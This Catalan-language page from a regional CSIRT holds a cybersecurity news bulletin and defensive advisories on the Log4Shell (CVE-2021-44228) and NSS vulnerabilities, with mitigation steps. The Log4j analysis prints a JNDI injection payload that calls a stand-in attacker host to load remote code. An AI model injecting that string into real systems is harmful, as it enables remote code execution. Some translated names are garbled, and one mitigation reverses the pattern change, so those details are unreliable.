Posted on

Butlletí 04/12/2021 – 17/12/2021

Com cada quinzena, posem a la vostra disposició un nou butlletí sobre les principals notícies relacionades amb el món de la ciberseguretat.

L’iniciem parlant del món de les aplicacions per a dispositius Android. S’ha detectat un troià, Joker, que ha aconseguit colar-se en descàrregues des de Google Play. El malware ha sigut trobat en 15 aplicacions, algunes d’aquestes amb més de 100.000 descàrregues. Aquest troià realitza fraus SMS a través de l’enviament de missatges a números no gratuïts. A més, pot subscriure els usuaris a llocs webs que ofereixen serveis de pagament, realitzant així també el frau mitjançant subscripcions prèmium.

Amb l’objectiu d’enfortir l’experiència de privacitat, s’ha inclòs una nova funció de protecció de contingut en Telegram, amb la qual els usuaris podran evitar que altres persones puguen guardar o reexpedir el material compartit en grups o canals de l’aplicació. D’aquesta manera, la plataforma garantirà que el contingut compartit en aquests grups romanga disponible solament per a les persones amb les quals va ser compartit inicialment.

També el sector automobilístic ha sigut notícia per un ciberatac a Volvo Cars amb robatori de dades de disseny i informació confidencial. L’actor d’amenaces, no identificat, va aconseguir accedir als seus sistemes de recerca i desenvolupament després d’atacar un conjunt de servidors. De moment, no hi ha indici que aquest incident puga tindre impacte en la integritat dels automòbils i la informació personal dels seus clients.

D’altra banda, volem posar l’accent que mai hem de recórrer a activacions de llicències no oficials, ja que en aquest cas, els usuaris que intenten activar Windows de manera pirata, s’estan trobant amb el malware CryptBot que tracta de robar les credencials de navegadors, carteres de criptomonedes, cookies, targetes de crèdit i captures de pantalla del sistema infectat. Per a la infecció, l’usuari només ha de fer un clic en uns dels enllaços maliciosos, descarregar KMSPico i punxar en l’executable. La instal·lació del KM és només una distracció mentre s’instal·la el malware, allargant l’espera de l’activació per a donar temps al malware a infectar el sistema.

Entorn de les criptomonedes, la plataforma de trading AscendEX ha patit un ciberatac millonario. Els ciberdelinqüents s’han pogut fer amb wallets amb un valor de 77 milions de dòlars, repartits de la manera següent:

      • Ethereum ($60 milions).
      • BinanceSmartChain ($9.2 milions).
      • Polygon ($8.5 milions).

Els usuaris que s’hagen vist afectats per l’atac seran recompensats amb la devolució de la criptomoneda sostreta. A més, es realitzarà una investigació amb la resta de companyies i amb les forces de la llei.

Com podeu comprovar, els ciberatacs continuen formant part del nostre dia a dia, per això des de CSIRT-CV continuem conscienciant els nostres adolescents de la Comunitat Valenciana quant als riscos que comporta l’ús d’Internet. Les Jornades de conscienciació en els centres de secundària formen part del Pla Valencià de Capacitació, que estem duent a terme amb la intenció de millorar la conscienciació en l’ús d’Internet tant dels alumnes, com de les famílies i dels docents del centre. Aquestes jornades són gratuïtes i pots veure més informació des de la nostra web.

Destaquem les alertes i actualitzacions més rellevants de la quinzena:

      • Actualitzacions de seguretat de Microsoft de desembre de 2021: 67 fallades de seguretat, de les quals set són crítiques i la resta estan catalogades com a gravetat alta. Una de les més crítiques és una vulnerabilitat que suplanta la identitat de l’instal·lador d’AppX que afecta Microsoft Windows. Els atacants han estat aprofitant aquesta vulnerabilitat per a instal·lar paquets que inclouen algunes famílies de malware com són Emotet, TrickBot o Bazaloader.
Posted on

Actualitat sobre la vulnerabilitat en Java Apatxe Log4j 2 (CVE-2021-44228), també coneguda com a Log4Shell

S’envia l’actualització següent per a informar que s’ha publicat un nou vector d’atac relacionat amb denegació de servei que no es corregeix actualitzant a la versió 2.15, tal com indiquem en l’anterior notificació. Per a solucionar totes les vulnerabilitats detectades, es recomana actualitzar a la nova versió alliberada 2.16.

Alerta anterior actualitzada:
Divendres passat 10/12/2021, es va publicar una vulnerabilitat que afecta les versions d’Apatxe Log4 des de 2.0 fins a 2.14.1. Aquesta llibreria és present en quasi tots els desenvolupaments basats en Java, tant comercials com a mesura.

A causa de la facilitat d’explotació i ampli abast de la llibreria, va ser categoritzada com a CRÍTICA (CVSS 10), ja que una explotació reeixida permetria l’execució remota de codi, i comprometria per complet l’equip i la seua informació.

En cas de detectar l’explotació d’aquesta vulnerabilitat, o si necessita informació addicional, pot contactar-nos en csirtcv@gva.es

 

ACCIONS CORPORATIVES REALITZADES

    • Des del divendres s’estan detectant nombrosos intents d’explotació contra els sistemes corporatius, però no tenint constància que cap haja sigut efectiu.
    • Des del perímetre de la xarxa s’estan monitorant i analitzant cadascun d’aquests intents, i gestionant amb els responsables dels sistemes cada incident particular.
    • S’estan bloquejant automàticament alguns intents d’explotació per al trànsit sense xifrar, i es preveu ampliar-lo al trànsit xifrat en breu, tant externament com internament (actuacions en curs).
    • Ja existia un filtrat de connexions sortints per a servidors que evita potencialment la infecció dels servidors.
    • S’estan analitzant els sistemes existents en la xarxa corporativa, tant automàticament com contra l’inventari, per a identificar sistemes vulnerables, i prendre les mesures particulars que procedisquen en cada cas.
    • S’han retirat les llibreries vulnerables dels repositoris de desenvolupament corporatius per a congelar qualsevol desenvolupament en curs que utilitze les llibreries vulnerables.

 

ACCIONS A PRENDRE PER PART DELS RESPONSABLES DELS SISTEMES
IMPRESCINDIBLE: eliminar la vulnerabilitat

    • La vulnerabilitat es pot mitigar en la version 2.10 i posteriors establint la propietat del sistema “log4j2.formatMsgNoLookups” en “true” o eliminant la classe JndiLookup del classpath.
    • Per a versions anteriors a 2.10.0, existeixen dues opcions:
      • Modificar el disseny de cada patró de registre per a canviar %m{nolookups} per %m en els arxius de configuració de registre.
      • Substituir una implementació buida o no vulnerable de la classe apatxe.logging.log4j.core.lookup.JndiLookup, de manera que el carregador de classes utilitze el reemplaçament en lloc de la versió vulnerable de la classe.

Accions compensatòries a nivell de xarxa

    • Si no s’utilitza la connexió a Internet corporativa o es disposa de tallafocs o dispositius amb capacitat de bloqueig, es recomana actualitzar les signatures i activar les proteccions proporcionades pel fabricant.
    • Per als servidors no administrats pel servei de sistemes de la Generalitat, bloquejar l’eixida a Internet, principalment dels que es troben en DMZ i permetre només llistes blanques.
    • Revisar si s’ha tingut un augment de connexions DNS des del passat cap de setmana.
    • Escanejar la xarxa a la recerca d’aplicacions i serveis vulnerables. Les aplicacions Nessus o Burp ja disposen de plugins específics.

Accions compensatòries a nivell de sistema operatiu

    • Revisar localment els servidors a la recerca d’aplicacions vulnerables i seguir les indicacions proporcionades pel CCN-Cert per a PowerShell, Linux, Go o cerques manuals:

https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html

    • L’eina Loki permet anàlisis locals amb regles YARA per a comprovar si un servidor ja ha sigut atacat utilitzant aquesta vulnerabilitat: https://github.com/Neo23x0/Loki

 

+INFORMACIÓ

Posted on

RCE en la llibreria log4j de Java

El dia 9 de desembre, es trobà un exploit 0-day en la llibreria de Java “log4j” que permetia l’execució de codi remot mitjançant el registre d’una cadena determinada.


ANÀLISI

CVE-2021-44228

La vulnerabilitat es dispara quan els logs d’un servidor contenen la càrrega útil (payload) $ {jndi:ldap://attacker.com/a} (on attacker.com és un servidor controlat per l’atacant). D’aquesta manera, log4j realitza una petició al servidor mitjançant Java Naming and Directory Interface (JNDI) i obté com a resposta la ruta a un arxiu de classe Java remot. Aquest payload permetrà que un atacant execute codi arbitrari [1].

Productes afectats:

2.0 <= Apache log4j <= 2.14.1

Actualment, la vulnerabilitat no té una puntuació CVSS v3 oficial. No obstant això, a causa de la seua gravetat, en moltes publicacions ha sigut considerada com a crítica [2].
En la pàgina de LunaSec [1] podem trobar un exemple d’explotació d’aquesta vulnerabilitat. A més, el projecte marshalsec ofereix una eina per a poder crear payloads, que podria ser utilitzada en aquesta vulnerabilitat.


RECOMANACIONS
Actualment no existeix una versió estable disponible. No obstant això, hi ha dos pegats candidats publicats com “log4j-2.15.0-rc1” i “log4j-2.15.0-rc2” disponibles en el GitHub d’Apache [3], que es recomana que s’instal·len. A més, per a versions superiors a la 2.10.0 s’ha afegit la propietat “formatMsgNoLookups” la configuració de la qual a “true” pot mitigar la vulnerabilitat temporalment [4].


REFERÈNCIES
(1) https://www.lunasec.io/docs/blog/log4j-zero-day/
(2) https://logging.apache.org/log4j/2.x/security.html
(3) https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
(4) https://issues.apache.org/jira/browse/LOG4J2-2109

Posted on

RCE en la validació de certificats del servei NSS

Recentment s’ha trobat una vulnerabilitat RCE en la validació de certificats del servei NSS.

NSS és un servei que permet la resolució de noms d’usuari i claus mitjançant l’accés a diferents bases de dades [1].

 

ANÀLISI

NSS és vulnerable a un desbordament de pila quan es manegen signatures DSA o RSA-PSS codificades en l’extensió .DER [2]. Aquesta vulnerabilitat permet a un atacant que es fa passar per un servidor SSL / TLS executar un codi remot en un client amb NSS quan es connecte per SSL / TLS. De manera inversa, un servidor amb NSS que processa certificats pot rebre’n un de maliciós a partir d’un client. [3]

La vulnerabilitat no té una puntuació CVSS v3 oficial, però diverses fonts la puntuen al voltant del 9 [2] [3], per la qual cosa es pot considerar que està revestida d’una certa gravetat. NSS és una tecnologia bastant estesa: el problema no es limita a TLS, sinó que són vulnerables totes les aplicacions que utilitzen la verificació de certificats NSS codificats en CMS, S/ACARONE, PKCS #7 o PKCS # 12 (com Thunderbird, LibreOffice, Evolution o Evince) o servidors NSS que processen certificats. És important remarcar que aquesta vulnerabilitat no afecta Mozilla Firefox pel fet que aquest utilitza mozilla::pkix per a verificar els certificats.

  •  

RECOMANACIONS
NSS ha resolt aquesta vulnerabilitat en les actualitzacions NSS 3.68.1 i NSS 3.73 [4], per la qual cosa és recomanable actualitzar totes les aplicacions que utilitzen la tecnologia NSS a aquestes versions [2].

 

REFERÈNCIES
(1) http://somebooks.es/12-2-que-es-nss/
(2) https://www.mozilla.org/en-US/security/advisories/mfsa2021-51/
(3) https://access.redhat.com/security/cve/CVE-2021-43527
(4) https://pkgs.org/download/nss-shlibsign